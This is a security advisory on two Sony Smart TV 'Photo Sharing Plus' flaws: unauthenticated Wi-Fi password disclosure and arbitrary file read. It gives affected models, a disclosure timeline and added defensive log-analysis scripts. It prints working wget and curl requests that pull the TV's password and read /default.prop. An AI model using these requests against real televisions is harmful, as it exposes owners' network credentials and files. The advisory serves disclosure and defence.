Sony Smart TV Information Disclosure / File Read Vulnerabilities

Author: xen1thLabs
Risk: Security Risk High
0day-ID: 0day-ID-32585
Category: local exploits
Date add: 24-04-2019
CVE: CVE-2019-10886, CVE-2019-11336
Platform: hardware

## ADVISORY INFORMATION

TITLE: Multiple vulnerabilities in Sony Smart TVs
ADVISORY URL: https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/
DATE PUBLISHED: 23/04/2019
AFFECTED VENDORS: Sony
RELEASE MODE: Coordinated release
CVE: CVE-2019-10886, CVE-2019-11336
CVSSv3 for CVE-2019-10886: 6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVSSv3 for CVE-2019-11336: 6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)



## PRODUCT DESCRIPTION

Sony Smart TVs ship with applications that add functionality for customers,
including the "Photo Sharing Plus" application.

The "Photo Sharing Plus" application running inside the Smart TV contains
several weaknesses. This application allows uploading pictures from a
smartphone to the TV in order to display them on a large screen.
When started, Photo Sharing Plus turns the TV into a Wi-Fi access point
and shows a Wi-Fi password, allowing customers to connect and share their media
content on the Sony Smart TV.



## DETAILS OF VULNERABILITIES

xen1thLabs found multiple vulnerabilities in Sony products in October 2018
and coordinated the disclosure of these vulnerabilities with Sony.
Two vulnerabilities were found in Sony Smart TVs by xen1thLabs while
auditing the security of Smart TVs.
The first vulnerability allows an attacker on the LAN/Wi-Fi, without
authentication, to retrieve the static Wi-Fi password created by the television
when the Photo Sharing Plus application is started.
The second vulnerability allows an attacker to read arbitrary files located on
the TV without authentication, including valuable files.

The summary of the vulnerabilities is:

- CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read
Vulnerability
- CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure
Vulnerability

The number of affected Sony models is very high and Sony has decided to remove
this vulnerable application from all models
(https://www.sony.com/electronics/support/televisions-projectors/articles/00204331).

Sony provided a non-exhaustive list of affected TV models from 2015-2016.
Recent models are also affected:

- KDL-50W800C
- KDL-50W805C
- KDL-50W807C
- KDL-50W809C
- KDL-50W820C
- KDL-55W800C
- KDL-55W805C
- KDL-65W850C
- KDL-65W855C
- KDL-65W857C
- KDL-75W850C
- KDL-75W855C
- XBR-43X830C
- XBR-49X800C
- XBR-49X830C
- XBR-49X835C
- XBR-49X837C
- XBR-49X839C
- XBR-55X805C
- XBR-55X807C
- XBR-55X809C
- XBR-55X810C
- XBR-55X850C
- XBR-55X855C
- XBR-55X857C
- XBR-65X800C
- XBR-65X805C
- XBR-65X807C
- XBR-65X809C
- XBR-65X810C
- XBR-65X850C
- XBR-65X855C
- XBR-65X857C
- XBR-75X850C
- XBR-75X855C
- XBR-55X900C
- XBR-55X905C
- XBR-55X907C
- XBR-65X900C
- XBR-65X905C
- XBR-65X907C
- XBR-65X930C
- XBR-75X910C
- XBR-75X940C
- XBR-75X945C
- XBR-43X800D
- XBR-49X800D
- XBR-49X835D
- XBR-55X850D
- XBR-55X855D
- XBR-55X857D
- XBR-65X850D
- XBR-65X855D
- XBR-65X857D
- XBR-75X850D
- XBR-75X855D
- XBR-75X857D
- XBR-85X850D
- XBR-85X855D
- XBR-85X857D
- XBR-55X930D
- XBR-65X930D
- XBR-65X935D
- XBR-65X937D
- XBR-75X940D
- XBR-100Z9D
- XBR-49X700D
- XBR-55X700D
- XBR-65X750D
- XBR-65Z9D
- XBR-75Z9D
- XBR-43X800E
- XBR-49X800E
- XBR-49X900E
- XBR-55A1E
- XBR-55X800E
- XBR-55X806E
- XBR-55X900E
- XBR-55X930E
- XBR-65A1E
- XBR-65X850E
- XBR-65X900E
- XBR-65X930E
- XBR-75X850E
- XBR-75X900E
- XBR-75X940E
- XBR-77A1E



### 1. CVE-2019-11336 Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability

An unauthenticated remote attacker can retrieve the plaintext wireless password
through the "Photo Sharing Plus" API.

After starting the application, the following example retrieves the wireless
password created by the TV (the IP address of the TV is 192.168.1.102) over the
LAN, without authentication:

```
root@kali:~# wget -qO- --post-data='{"id":80,"method":"getContentShareServerInfo","params":[],"version":"1.0"}' http://[ip_tv]:10000/contentshare/
{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}
```

The password is 8362tbwX.

By reading the TV's logs, we can confirm the password has been delivered over
HTTP, without authentication. The logs contain the password in plaintext:

```
01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}
```

It is also important to note that the wireless password generated by the TV is
always the same. Even after a hard reboot and a disconnection from the power
supply, the generated password is always the same. This lack of randomness
is also a security issue.
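
Both observations above (the key written to the log in plaintext, and the same key returned on every boot) can be checked from collected TV logs. The following is an added example, not code from the advisory or from Sony: the function names, the boot labels and the second log line are constructed for illustration, while the first log line is the one shown above.

```python
import json
import re

# Matches the "HttpEndPoint: send:" line format shown in the TV log above.
SEND_RE = re.compile(
    r"^(?P<ts>\d\d-\d\d \d\d:\d\d:\d\d\.\d+) .*HttpEndPoint: send: (?P<body>\{.*\})$"
)

def disclosed_keys(log_lines):
    """Return (timestamp, ssid, key) for each logged response carrying a Wi-Fi key."""
    found = []
    for line in log_lines:
        m = SEND_RE.match(line.strip())
        if not m:
            continue
        try:
            body = json.loads(m["body"])
        except json.JSONDecodeError:
            continue  # truncated or non-JSON payload
        for entry in body.get("result", []):
            if isinstance(entry, dict) and entry.get("key"):
                found.append((m["ts"], entry.get("ssid", ""), entry["key"]))
    return found

def reused_keys(captures):
    """captures maps a boot label to its log lines; return keys seen in more than one boot."""
    seen = {}
    for boot, lines in captures.items():
        for _ts, ssid, key in disclosed_keys(lines):
            seen.setdefault((ssid, key), set()).add(boot)
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}

def redact(line):
    """Mask the key value so the log line can be stored or shared."""
    return re.sub(r'("key":")[^"]*"', r'\1<redacted>"', line)

# Line 1 is the advisory's log line; line 2 is constructed (same response, later boot).
PAYLOAD = r'{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}'
CAPTURES = {
    "boot-1": ["01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: " + PAYLOAD],
    "boot-2": ["01-01 09:12:04.115 5540 19001 I System.out: [MEXI][D] HttpEndPoint: send: " + PAYLOAD],
}

if __name__ == "__main__":
    for (ssid, key), boots in reused_keys(CAPTURES).items():
        print(f"{ssid}: same key served in {boots}")
    print(redact(CAPTURES["boot-1"][0]))
```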



### 2. CVE-2019-10886 Sony Smart TV Photo Sharing Plus Arbitrary File Read Vulnerability

It is possible to retrieve internal TV files over HTTP without authentication.

By default, images used by the Photo Sharing Plus application are stored inside
`/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/`.
The application starts an access point on the television, and an HTTP daemon
listens on a TCP port on this WLAN.
Furthermore, this daemon also listens on the LAN side of the television, so it
is possible to retrieve an image from the LAN using this URL:

http://[ip_tv]:10000/contentshare/image/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG

Browsing the address http://[ip_tv]:10000/contentshare/image/ allows getting
access to the root directory of the television running Android.

By exploiting this vulnerability, /default.prop (containing Android properties)
can be retrieved via http://192.168.1.102:10000/contentshare/image/default.prop:

```
root@kali:~# curl -v http://192.168.1.102:10000/contentshare/image/default.prop
* Trying 192.168.1.102...
* TCP_NODELAY set
* Connected to 192.168.1.102 (192.168.1.102) port 10000 (#0)
> GET /contentshare/image/default.prop HTTP/1.1
> Host: 192.168.1.102:10000
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Connection: close
< Content-Length: 591
< Content-Type: application/octet-stream
<
#
# ADDITIONAL_DEFAULT_PROPERTIES
#
ro.secure=1
security.perf_harden=1
ro.allow.mock.location=0
ro.debuggable=0
ro.zygote=zygote32
dalvik.vm.image-dex2oat-Xms=64m
dalvik.vm.image-dex2oat-Xmx=64m
dalvik.vm.dex2oat-Xms=64m
dalvik.vm.dex2oat-Xmx=512m
ro.dalvik.vm.native.bridge=0
debug.atrace.tags.enableflags=0
#
# BOOTIMAGE_BUILD_PROPERTIES
#
ro.bootimage.build.date=2016? 11? 14? ??? 15:34:56 JST
ro.bootimage.build.date.utc=1479105296
ro.bootimage.build.fingerprint=Sony/BRAVIA_ATV2_PA/BRAVIA_ATV2:6.0.1/MMB29V.S50/1.6.0.06.14.0.00:user/release-keys
persist.sys.usb.config=none

* Closing connection 0
```

Logs in the TV confirm the /default.prop file has been delivered over HTTP:

```
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]getLocalFilePath() start, uri=/contentshare/image/default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]loadType: /contentshare/image
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]ext:.prop
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Content Type :application/octet-stream
01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]fileSize:591
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response ... 591
01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response completed.
```
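
The condition is visible in the TV's own log as a `localResPath` that falls outside the application's image directory. The following is an added example, not code from the advisory or from Sony: it applies a path-confinement check to log lines in the format shown above. The function names and the second and third sample lines are constructed for illustration.

```python
import posixpath
import re

# Directory the advisory names as the application's image store.
PHOTO_DIR = "/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP"

def is_confined(local_path, base=PHOTO_DIR):
    """True only if the normalised path stays inside the image store.

    This is a lexical check, which is all a log can support. A handler on the
    device would also need to canonicalise the path to resolve symlinks.
    """
    norm = posixpath.normpath("/" + local_path.lstrip("/"))
    return norm.startswith(base + "/")

# Matches the "localResPath" debug line format shown in the TV log above.
RES_RE = re.compile(
    r"^(?P<ts>\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+\d+\s+(?P<tid>\d+)\s+D PhotoShareApp: "
    r"\[\d+\]\[e\]localResPath: (?P<path>.+)$"
)

def out_of_store_reads(log_lines):
    """Return (timestamp, thread id, path) for reads resolved outside PHOTO_DIR."""
    hits = []
    for line in log_lines:
        m = RES_RE.match(line.strip())
        if m and not is_confined(m["path"]):
            hits.append((m["ts"], m["tid"], m["path"]))
    return hits

# Line 1 is from the advisory's log; lines 2 and 3 are constructed
# (a legitimate image fetch, and a path that climbs out of the store).
SAMPLE_LOG = [
    "01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop",
    "01-01 07:46:05.120 5539 18776 D PhotoShareApp: [18776][e]localResPath: "
    + PHOTO_DIR + "/LJYT0010.JPG",
    "01-01 07:46:09.300 5539 18777 D PhotoShareApp: [18777][e]localResPath: "
    + PHOTO_DIR + "/../../../../../../default.prop",
]

if __name__ == "__main__":
    for ts, tid, path in out_of_store_reads(SAMPLE_LOG):
        print(f"{ts} thread={tid} read outside image store: {path}")
```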


## DISCLOSURE TIMELINE

03/10/2018 - Vulnerabilities found
10/10/2018 - Report to Sony through the Sony bug bounty program on HackerOne
12/10/2018 - Confirmation of the reception of the bug report
15/10/2018 - xen1thLabs explains that the vulnerabilities are also exploitable
over HbbTV (DVB-{S,T,C}) - through HackerOne
29/10/2018 - Sony confirms the vulnerabilities
09/11/2018 - Sony confirms the patches will be available in March 2019 and asks
xen1thLabs to wait until April 2019
29/11/2018 - xen1thLabs sent the slides prior to xen1thLabs's HiTB 2018 Dubai
talk as agreed with Sony
14/01/2019 - Updates requested from xen1thLabs
15/01/2019 - Sony informs xen1thLabs that they are working on patches
27/01/2019 - Updates requested from xen1thLabs
07/03/2019 - Updates requested from xen1thLabs
15/03/2019 - Sony informs xen1thLabs that the agreed date for disclosure is not
possible because they don't know when they will be ready "maybe in a couple of
months"
17/03/2019 - Updates requested from Sony to understand and to publish a
security advisory. xen1thLabs also requests CVEs officially
20/03/2019 - xen1thLabs asks for an acceptable timeline
21/03/2019 - xen1thLabs sent an email to Secure@Sony.com due to the lack of
proper communication from Sony, informing Sony that in order to protect
their customers xen1thLabs needs to publish a security advisory
21/03/2019 - Automatic response from Secure@Sony.com: the address is no longer
in use
22/03/2019 - Sony is working on the patches and confirms the 12th April
26/03/2019 - xen1thLabs confirms the release date of the advisory and asks for
CVEs
01/04/2019 - Sony confirms the vulnerabilities affect some models and
"Sony plans to terminate Photo Sharing Plus service for all of models,
and that completion date is scheduled for April 12th, 2019."
16/04/2019 - Sony only provides one CVE instead of two. Sony states
"the wireless password recovery is within Sony's TV specification and is
expected behavior and Sony will not be submitting for a CVE regarding this"
17/04/2019 - xen1thLabs requests a CVE from MITRE
23/04/2019 - Public disclosure



## SOLUTION

Apply patches provided by Sony
